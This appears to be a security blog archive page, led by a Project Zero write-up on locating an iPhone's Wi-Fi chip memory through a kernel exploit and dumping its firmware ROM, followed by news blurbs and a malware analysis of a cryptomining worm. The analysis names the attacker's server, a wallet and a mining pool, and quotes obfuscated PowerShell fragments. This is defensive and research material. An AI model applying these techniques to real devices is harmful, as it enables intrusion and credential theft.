Monthly Archives: September 2017

Over The Air – Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Posted by Gal Beniamini, Project Zero

Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.

Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.

As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.

More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including Apple TV and iWatch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.

We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.

For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.

Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on the framework extensively, to both analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself.

The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.

Creating a Research Platform


Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.

During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straight-forward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.

For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.

Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.

Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.

Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.


Unfortunately, it appears we have no such luck this time around!

First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.

Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.

That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).

Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.


So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.

Acquiring the ROM?


Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.

Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:


Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (also, it curiously does not appear under Broadcom’s website).

Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.

However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?

We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.


That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring a such a setup for each research device would cause us to incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the amount of researchers who’d be willing to utilise our research platform -- both because hardware is a relatively specialised skill-set, and since people might (rightly) be wary of causing damage to their own devices.

So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?

To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR


As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.

Reviewing the driver’s code allows us to arrive at relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming and mapping in the BARs into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space; BAR0 and BAR1.

BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.

BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.

This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.

To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.

Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe, serves a complementary role; it is a low-level driver tasked with handling all the PCIe related communication protocols, dealing with MSI interrupts, and generally everything interface-related.

We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.

After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that appear like candidates for TCM accessors. All the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!

Kernel Function 0xFFFFFFF006D1D9F0

Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.


To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object for now on as the “PCIe object”, and we’ll refer to the driver by its full name; “AppleBCMWLANBusInterfacePCIe”.

Kernel Memory Analysis Framework


Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...

Instead, we’ll have to create our kernel debugger!

Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.

To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.

Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need use the same version on our target iPhone to utilise it.

To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.

Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependance on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read or write operation, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.

A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.

Lastly, there’s the question of the research platform itself. For convenience sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.

Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in place where the code is hard to untangle.

Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.

Setting Up a Test Network


Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.

As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).

Lastly, we require complete control over all aspects of our Wi-Fi router. This is since the next part of our research will deal extensively with the Wi-Fi layer. As such we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.

Putting the above requirements together, we arrive at the following basic topology:


In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.

Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.

The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network (mesu.apple.com, appldnld.apple.com).

Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).

Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:


Finding the TCM


Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!

We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.

So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we’d need to do is check each object against that address.

Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.

Kernel Function 0xFFFFFFF006D34734

(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).

Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.

To test out this hypothesis, let’s write a short python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).


After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.

So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...

On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so,  tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.

After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.

The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.

So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of the their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.

Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue -  contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).

Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.

Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:


Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.

Acquiring the ROM


The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.

Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!

Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return back to the original function. The shellcode stub itself is written into the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.


Building on this technique, let’s insert a hook into a commonly invoked RAM function (such the the chip’s “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we’ll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, cause the host to subsequently extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.


Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!

To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.

There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternately, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields in the object.

Regardless, all of the above methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:


Building a Wi-Fi Firmware Debugger


Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.

Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.

In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.

Wrapping Up


In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!

In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.

QOTD – SEC Chair Clayton on Need for Cooperation

Cybersecurity must be more than a firm-by-firm or agency-by-agency effort. Active and open communication between and among regulators and the private sector also is critical to ensuring the nation’s financial system is robust and effectively protected. Information sharing and coordination are essential for regulators to anticipate potential cyber threats and respond to a major cyberattack, should one arise.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "Emailing: Scan0xxx" from "Sales" delivers Locky or Trickbot

This fake document scan delivers different malware depending on the victim's location: Subject:       Emailing: Scan0963 From:       "Sales" [sales@victimdomain.tld] Date:       Thu, September 28, 2017 10:31 am Your message is ready to be sent with the following file or link attachments: Scan0963 Note: To protect against computer viruses, e-mail programs may prevent sending or receiving

Enterprise Security Weekly #63 – Temporal Tempura

Paul and John discuss network security architecture. In the news, Google Cloud acquires Bitium, Ixia extends cloud visibility, Lacework now supports Microsoft Windows Server, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode63

Visit https://www.securityweekly.com/esw for all the latest episodes!

Hack Naked News #142 – September 26, 2017

Tracking cars, iOS 11 patches eight vulnerabilities, Equifax dumps their CEO, High Sierra gets slammed with a 0-day, and more. Jason Wood of Paladin Security discusses an email DDos threat on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode142

Visit http://hacknaked.tv for all the latest episodes!

Advanced ‘all in memory’ CryptoWorm

Introduction.

Today I want to share a nice Malware analysis having an interesting flow. The "interesting" adjective comes from the abilities the given sample owns. Capabilities of exploiting, hard obfuscations and usage of advanced techniques to steal credentials and run commands. 

The analyzed sample has been provided by a colleague of mine (Alessandro) who received the first stage by eMail. A special thanks to Luca and Edoardo for having recognized XMRig during the last infection stage.   

General View.

The following image shows the general view of the entire attack path. As you might appreciate from the picture, that flow could be considered a complex flow since many specific artifacts were included in the attack phases.  The initial stage starts by abusing the user inexperience taking him/her to click on a first stage file called  (in my case) y1.bat. Nowadays eMail vector is one of the most favorite vectors used by attackers and easily implemented to deliver malicious contents. Once the first stage is run, it downloads and executes a second stage file called info6.ps1: a heavy obfuscated PowerShell script which drops (by de-obfuscate it directly on body) three internal resources: 
  1. Mimikatz.dll. This module is used to steal user administrative credentials.
  2. Utilities. This module is used to scan internal networks in order to propagate the infection, it is used to run several internal utilities such as (but not limited to): de-obfuscation routines,  ordering arrays and running exploits. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
  3. Exploits. This module is a set of known exploits such as eternalblue7_exploit and eternal_blue_powershell used from the initial stage of attack to infect internal machines .
Full Stage Attack Path

The last stage (info.vbs) drops and runs an executable file which has been recognized to be XMRig. XMRig is an open sourced Monero CPU Miner, freely available on github. The infection tries to propagate itself by scanning and attacking internal resources through the Exploit module, while the XMRig module mines Monero cryptocurrency giving to the attacker fresh "crypto money" by stealing victims resources. 

Analysis.

A romantic but still "working" .bat file is propagated to the victim by email or message. Once the user clicks on it, the .bat file would run the following command spawning a powershell able to download and run a script called info6.ps1 from http://118.184.48.95:8000/

Stage1: Downloads and Run 
The downloaded powershell file is clearly divided into two macro blocks both of them obfuscated. The following image shows the two visual sections which I am going to call them: "half up" (section before the "new line") and "half down" (section after the "new line").

Stage2: Two Visual Sections to be explored
While the "half up" section fairly appears to be a Base64 encoded text file, the "half down" section looks like encoded through a crafted function which, fortunately (and certain), appears in clear text at the end of such a file. By editing that function it is possible to modify the decoding process making it saving the decoded text file directly to a desired folder. The following image shows the decoded second stage "half dow" section.  

Decoded Second Stage "Half Down"
Analyzing the section code it would be easy to agree that the main used functions are dynamically extracted from the file itself, by performing a substring operations on the current content.


$funs=$fa.SubsTrIng(0,406492)

$mimi=$fa.sUBStrInG(406494,1131864)

$mon=$fa.suBstrING(1538360,356352)
$vcp=$fa.sUBStRiNG(1894714,880172)
$vcr=$fa.sUBstrINg(2774888,1284312)
$sc=$fa.sUBsTrinG(4059202)

  
The content of $fa variable and every function related to it is placed in the "half up" section which after being decoded looks like the following image.

Decoded Second Stage "Half Up"
The second stage "half up" code is borrowed from Kevin Robertson (Irken), the attacker reused many useful functionalities from Irken including the Invoke-TheHas routine which could be used through SMB to execute commands or to executes direct code having special rights. 

A surprisingly interesting line of code is found on the same stage (Second stage "half down"): NTLM= Get-creds mimi mimi  where the Get-creds function (coming from the Based64 decoded "half up") runs, by using the reflectoin techique, a DLL function. So by definition the mimi parameter has to be a DLL file included somewhere in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864) Where 406494 is the start character and the 1131864 is the last character to be interpreted as a dynamic loaded library. Fortunately the dropped DLL is a well known library, widely used in penetration testing named Mimikatz. It would be clear that the attacker uses the Mimikatz library to grab user (and eventually administrators) passwords. Once the passwords stealing activity is done the Malware starts to scan internal networks for known vulnerabilities such as MS17/10. The identified exploits have been borrowed from tevora-thrat and woravit since same peace of codes, same comments and same variable names have been found. If the Malware finds vulnerability on local area networks it tries to infect the machine by injecting itself (info6.ps1) through EthernalBlue and then it begins its execution from the second Stage.

On the same thread the Malware drops and runs a .vbs file (Third Stage) and it gets persistence through WMIClass on service.

Introducing the Third Stage
 The info.vbs drops and executes from itself a compiled version of XMRIG renamed with the "mimetic" string: taskservice.exe.  Once the compiled PE file (XMRig) is placed in memory the new stage starts it by running the following commands.

Third Stage Execution of Monero Miner
The clear text Monero address is visible on the code. Unfortunately the Monero address is not trackable so far. 

Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE

and the used server is: stratum+tcp://pool.supportxmr.com:80
